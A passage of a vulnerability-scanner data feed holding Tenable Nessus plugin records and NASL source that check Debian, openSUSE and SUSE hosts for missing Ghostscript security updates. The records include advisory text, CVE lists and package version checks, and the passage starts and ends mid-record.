"2018-11-13T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ghostscript", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4336.NASL", "href": "https://www.tenable.com/plugins/nessus/118893", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4336. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118893);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/21\");\n\n script_cve_id(\n \"CVE-2018-11645\",\n \"CVE-2018-17961\",\n \"CVE-2018-18073\",\n \"CVE-2018-18284\"\n );\n script_xref(name:\"DSA\", value:\"4336\");\n script_xref(name:\"IAVB\", value:\"2019-B-0081-S\");\n\n script_name(english:\"Debian DSA-4336-1 : ghostscript - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in Ghostscript, the GPL\nPostScript/PDF interpreter, which may result in denial of service,\ndisclosure of existence and size of arbitrary files, or the execution\nof arbitrary code if a malformed Postscript file is processed (despite\nthe dSAFER sandbox being enabled).\n\nThis update rebases ghostscript for stretch to the upstream version\n9.25 which includes additional non-security related changes.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=910678\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=910758\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=911175\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/ghostscript\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/stretch/ghostscript\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2018/dsa-4336\");\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ghostscript packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 9.25~dfsg-0+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/13\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"ghostscript\", reference:\"9.25~dfsg-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ghostscript-dbg\", reference:\"9.25~dfsg-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ghostscript-doc\", reference:\"9.25~dfsg-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ghostscript-x\", reference:\"9.25~dfsg-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgs-dev\", reference:\"9.25~dfsg-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgs9\", reference:\"9.25~dfsg-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgs9-common\", reference:\"9.25~dfsg-0+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:40:17", "description": "This update for ghostscript to version 9.26 fixes the following \nissues :\n\nSecurity issues fixed :\n\n - CVE-2018-19475: Fixed bypass of an intended access\n restriction in psi/zdevice2.c (bsc#1117327)\n\n - CVE-2018-19476: Fixed bypass of an intended access\n restriction in psi/zicc.c (bsc#1117313)\n\n - CVE-2018-19477: Fixed bypass of an intended access\n restriction in psi/zfjbig2.c (bsc#1117274)\n\n - CVE-2018-19409: Check if another device is used\n correctly in LockSafetyParams (bsc#1117022)\n\n - CVE-2018-18284: Fixed potential sandbox escape through\n 1Policy operator (bsc#1112229)\n\n - CVE-2018-18073: Fixed leaks through operator in saved\n execution stacks (bsc#1111480)\n\n - CVE-2018-17961: Fixed a -dSAFER sandbox escape by\n bypassing executeonly (bsc#1111479)\n\n - CVE-2018-17183: Fixed a potential code injection by\n specially crafted PostScript files (bsc#1109105)\n\nVersion update to 9.26 (bsc#1117331) :\n\n - Security issues have been the primary focus\n\n - Minor bug fixes and improvements\n\n - For release summary see:\n http://www.ghostscript.com/doc/9.26/News.htm\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "title": "openSUSE Security Update : ghostscript (openSUSE-2019-1007)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-19476", "CVE-2018-18284", "CVE-2018-19477", "CVE-2018-19475", "CVE-2018-19409"], "modified": "2019-03-27T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ghostscript-mini-debuginfo", "p-cpe:/a:novell:opensuse:ghostscript-x11", "p-cpe:/a:novell:opensuse:ghostscript", "p-cpe:/a:novell:opensuse:ghostscript-mini", "p-cpe:/a:novell:opensuse:libspectre1", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:libspectre-debugsource", "p-cpe:/a:novell:opensuse:ghostscript-x11-debuginfo", "p-cpe:/a:novell:opensuse:ghostscript-devel", "p-cpe:/a:novell:opensuse:ghostscript-debugsource", "p-cpe:/a:novell:opensuse:libspectre-devel", "p-cpe:/a:novell:opensuse:libspectre1-debuginfo", "p-cpe:/a:novell:opensuse:ghostscript-mini-devel", "p-cpe:/a:novell:opensuse:ghostscript-debuginfo", "p-cpe:/a:novell:opensuse:ghostscript-mini-debugsource"], "id": "OPENSUSE-2019-1007.NASL", "href": "https://www.tenable.com/plugins/nessus/123151", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-1007.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123151);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-17183\", \"CVE-2018-17961\", \"CVE-2018-18073\", \"CVE-2018-18284\", \"CVE-2018-19409\", \"CVE-2018-19475\", \"CVE-2018-19476\", \"CVE-2018-19477\");\n script_xref(name:\"IAVB\", value:\"2019-B-0081-S\");\n\n script_name(english:\"openSUSE Security Update : ghostscript (openSUSE-2019-1007)\");\n script_summary(english:\"Check for the openSUSE-2019-1007 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for ghostscript to version 9.26 fixes the following \nissues :\n\nSecurity issues fixed :\n\n - CVE-2018-19475: Fixed bypass of an intended access\n restriction in psi/zdevice2.c (bsc#1117327)\n\n - CVE-2018-19476: Fixed bypass of an intended access\n restriction in psi/zicc.c (bsc#1117313)\n\n - CVE-2018-19477: Fixed bypass of an intended access\n restriction in psi/zfjbig2.c (bsc#1117274)\n\n - CVE-2018-19409: Check if another device is used\n correctly in LockSafetyParams (bsc#1117022)\n\n - CVE-2018-18284: Fixed potential sandbox escape through\n 1Policy operator (bsc#1112229)\n\n - CVE-2018-18073: Fixed leaks through operator in saved\n execution stacks (bsc#1111480)\n\n - CVE-2018-17961: Fixed a -dSAFER sandbox escape by\n bypassing executeonly (bsc#1111479)\n\n - CVE-2018-17183: Fixed a potential code injection by\n specially crafted PostScript files (bsc#1109105)\n\nVersion update to 9.26 (bsc#1117331) :\n\n - Security issues have been the primary focus\n\n - Minor bug fixes and improvements\n\n - For release summary see:\n http://www.ghostscript.com/doc/9.26/News.htm\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n # http://www.ghostscript.com/doc/9.26/News.htm\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.ghostscript.com/doc/9.26/News.htm\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1109105\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1111479\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1111480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112229\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117274\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117313\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117331\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected ghostscript packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-debuginfo-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-debugsource-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-devel-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-mini-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-mini-debuginfo-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-mini-debugsource-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-mini-devel-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-x11-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"ghostscript-x11-debuginfo-9.26-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libspectre-debugsource-0.2.8-lp150.2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libspectre-devel-0.2.8-lp150.2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libspectre1-0.2.8-lp150.2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libspectre1-debuginfo-0.2.8-lp150.2.6.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript-mini / ghostscript-mini-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-14T06:16:33", "description": "This update for ghostscript to version 9.26 fixes the following \nissues :\n\nSecurity issues fixed :\n\nCVE-2018-19475: Fixed bypass of an intended access restriction in\npsi/zdevice2.c (bsc#1117327)\n\nCVE-2018-19476: Fixed bypass of an intended access restriction in\npsi/zicc.c (bsc#1117313)\n\nCVE-2018-19477: Fixed bypass of an intended access restriction in\npsi/zfjbig2.c (bsc#1117274)\n\nCVE-2018-19409: Check if another device is used correctly in\nLockSafetyParams (bsc#1117022)\n\nCVE-2018-18284: Fixed potential sandbox escape through 1Policy\noperator (bsc#1112229)\n\nCVE-2018-18073: Fixed leaks through operator in saved execution stacks\n(bsc#1111480)\n\nCVE-2018-17961: Fixed a -dSAFER sandbox escape by bypassing\nexecuteonly (bsc#1111479)\n\nCVE-2018-17183: Fixed a potential code injection by specially crafted\nPostScript files (bsc#1109105)\n\nVersion update to 9.26 (bsc#1117331): Security issues have been the\nprimary focus\n\nMinor bug fixes and improvements\n\nFor release summary see: http://www.ghostscript.com/doc/9.26/News.htm\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : ghostscript (SUSE-SU-2018:4087-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-19476", "CVE-2018-18284", "CVE-2018-19477", "CVE-2018-19475", "CVE-2018-19409"], "modified": "2019-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libspectre1-debuginfo", "p-cpe:/a:novell:suse_linux:ghostscript-debuginfo", "p-cpe:/a:novell:suse_linux:ghostscript-x11-debuginfo", "p-cpe:/a:novell:suse_linux:ghostscript-devel", "p-cpe:/a:novell:suse_linux:ghostscript-mini-devel", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:ghostscript-x11", "p-cpe:/a:novell:suse_linux:ghostscript-mini-debuginfo", "p-cpe:/a:novell:suse_linux:libspectre1", "p-cpe:/a:novell:suse_linux:ghostscript-mini", "p-cpe:/a:novell:suse_linux:ghostscript-mini-debugsource", "p-cpe:/a:novell:suse_linux:ghostscript-debugsource", "p-cpe:/a:novell:suse_linux:libspectre-debugsource", "p-cpe:/a:novell:suse_linux:ghostscript", "p-cpe:/a:novell:suse_linux:libspectre-devel"], "id": "SUSE_SU-2018-4087-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120186", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:4087-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120186);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-17183\", \"CVE-2018-17961\", \"CVE-2018-18073\", \"CVE-2018-18284\", \"CVE-2018-19409\", \"CVE-2018-19475\", \"CVE-2018-19476\", \"CVE-2018-19477\");\n script_xref(name:\"IAVB\", value:\"2019-B-0081-S\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : ghostscript (SUSE-SU-2018:4087-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for ghostscript to version 9.26 fixes the following \nissues :\n\nSecurity issues fixed :\n\nCVE-2018-19475: Fixed bypass of an intended access restriction in\npsi/zdevice2.c (bsc#1117327)\n\nCVE-2018-19476: Fixed bypass of an intended access restriction in\npsi/zicc.c (bsc#1117313)\n\nCVE-2018-19477: Fixed bypass of an intended access restriction in\npsi/zfjbig2.c (bsc#1117274)\n\nCVE-2018-19409: Check if another device is used correctly in\nLockSafetyParams (bsc#1117022)\n\nCVE-2018-18284: Fixed potential sandbox escape through 1Policy\noperator (bsc#1112229)\n\nCVE-2018-18073: Fixed leaks through operator in saved execution stacks\n(bsc#1111480)\n\nCVE-2018-17961: Fixed a -dSAFER sandbox escape by bypassing\nexecuteonly (bsc#1111479)\n\nCVE-2018-17183: Fixed a potential code injection by specially crafted\nPostScript files (bsc#1109105)\n\nVersion update to 9.26 (bsc#1117331): Security issues have been the\nprimary focus\n\nMinor bug fixes and improvements\n\nFor release summary see: http://www.ghostscript.com/doc/9.26/News.htm\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.ghostscript.com/doc/9.26/News.htm\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.ghostscript.com/doc/9.26/News.htm\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1109105\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1111479\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1111480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1112229\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1117022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1117274\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1117313\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1117327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1117331\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-17183/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-17961/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-18073/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-18284/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19409/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19475/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19476/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19477/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20184087-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1602a3db\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2018-2914=1\n\nSUSE Linux Enterprise Module for Desktop Applications 15:zypper in -t\npatch SUSE-SLE-Module-Desktop-Applications-15-2018-2914=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2018-2914=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-mini\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-mini-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-mini-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-mini-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libspectre-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libspectre-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libspectre1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libspectre1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && 